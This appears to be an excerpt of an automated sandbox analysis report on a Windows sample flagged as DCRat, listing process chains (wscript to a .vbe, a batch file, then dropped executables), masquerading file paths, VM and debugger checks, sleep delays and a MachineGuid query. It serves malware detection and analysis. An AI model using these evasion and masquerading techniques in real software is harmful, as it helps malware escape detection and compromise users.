Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Memory allocated: F10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Memory allocated: 1AD50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Memory allocated: F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Memory allocated: 1AAA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\dasHost.exe	Memory allocated: B90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\dasHost.exe	Memory allocated: 1A990000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\dasHost.exe	Memory allocated: 7D0000 memory reserve \| memory write watch
Source: C:\Recovery\dasHost.exe	Memory allocated: 1A360000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Memory allocated: 1460000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Memory allocated: 1AFC0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Memory allocated: 18C0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Memory allocated: 1B2E0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Memory allocated: 860000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Memory allocated: 1A360000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Memory allocated: EA0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Memory allocated: 1AAF0000 memory reserve \| memory write watch

Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\dasHost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\dasHost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Window / User API: threadDelayed 2092	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Window / User API: threadDelayed 488	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Window / User API: threadDelayed 617	Jump to behavior
Source: C:\Recovery\dasHost.exe	Window / User API: threadDelayed 367	Jump to behavior
Source: C:\Recovery\dasHost.exe	Window / User API: threadDelayed 368
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Window / User API: threadDelayed 362
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Window / User API: threadDelayed 369
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Window / User API: threadDelayed 367

Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe TID: 3720	Thread sleep count: 2092 > 30	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe TID: 3720	Thread sleep count: 55 > 30	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe TID: 6428	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe TID: 3200	Thread sleep count: 488 > 30	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe TID: 3200	Thread sleep count: 617 > 30	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe TID: 7228	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe TID: 7228	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe TID: 7228	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe TID: 7228	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe TID: 7092	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Recovery\dasHost.exe TID: 4832	Thread sleep count: 367 > 30	Jump to behavior
Source: C:\Recovery\dasHost.exe TID: 6540	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Recovery\dasHost.exe TID: 1252	Thread sleep count: 368 > 30
Source: C:\Recovery\dasHost.exe TID: 6352	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe TID: 380	Thread sleep count: 362 > 30
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe TID: 3292	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe TID: 7192	Thread sleep count: 283 > 30
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe TID: 7192	Thread sleep count: 329 > 30
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe TID: 7116	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe TID: 2352	Thread sleep count: 369 > 30
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe TID: 1628	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe TID: 5860	Thread sleep count: 367 > 30
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe TID: 2284	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Recovery\dasHost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Recovery\dasHost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008CA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_008CA5F4
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008DB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_008DB8E0
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008EAAA8 FindFirstFileExA,	0_2_008EAAA8

Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe

Code function: 0_2_008DDD72 VirtualQuery,GetSystemInfo,

0_2_008DDD72

Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\dasHost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\dasHost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Thread delayed: delay time: 922337203685477

Source: wscript.exe, 00000001.00000003.2093978565.0000000000B09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56
Source: Runtimemonitor.exe, 00000005.00000002.2111737908.000000001BC8C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\z
Source: wscript.exe, 00000001.00000003.2093337739.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}d
Source: Runtimemonitor.exe, 00000005.00000002.2111737908.000000001BC8C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}&
Source: QoRXFaE8Xn.exe, 00000000.00000003.2009178407.0000000002E37000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Runtimemonitor.exe, 00000005.00000002.2111863703.000000001BE01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: QoRXFaE8Xn.exe, 00000000.00000003.2009178407.0000000002E37000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}{
Source: ihpxTeRPVLYTpFZNVeq.exe, 00000012.00000002.2160868319.000000001BA70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Runtimemonitor.exe, 00000005.00000002.2111885431.000000001BE13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe

API call chain: ExitProcess graph end node

graph_0-23757

Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe

Code function: 0_2_008E866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_008E866F

Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe

Code function: 0_2_008E753D mov eax, dword ptr fs:[00000030h]

0_2_008E753D

Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe

Code function: 0_2_008EB710 GetProcessHeap,

0_2_008EB710

Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Recovery\dasHost.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008DF063 SetUnhandledExceptionFilter,	0_2_008DF063
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008DF22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_008DF22B
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008E866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_008E866F
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008DEF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_008DEF05

Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\PortcomAgentwinbroker\w1FXjdRze6k4uvStmhH3M.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PortcomAgentwinbroker\1uTBfrpLb993XlgcpIpPee79uOtZ.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\PortcomAgentwinbroker\Runtimemonitor.exe "C:\PortcomAgentwinbroker\Runtimemonitor.exe"	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process created: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe "C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe"	Jump to behavior

Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe

Code function: 0_2_008DED5B cpuid

0_2_008DED5B

Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_008DA63C

Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Queries volume information: C:\PortcomAgentwinbroker\Runtimemonitor.exe VolumeInformation	Jump to behavior
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Queries volume information: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe VolumeInformation	Jump to behavior
Source: C:\Recovery\dasHost.exe	Queries volume information: C:\Recovery\dasHost.exe VolumeInformation	Jump to behavior
Source: C:\Recovery\dasHost.exe	Queries volume information: C:\Recovery\dasHost.exe VolumeInformation
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Queries volume information: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe VolumeInformation
Source: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	Queries volume information: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Queries volume information: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Queries volume information: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe VolumeInformation

Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe

Code function: 0_2_008DD5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_008DD5D4

Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe

Code function: 0_2_008CACF5 GetVersionExW,

0_2_008CACF5

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000014.00000002.2214484394.00000000023A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2109875192.0000000002F37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
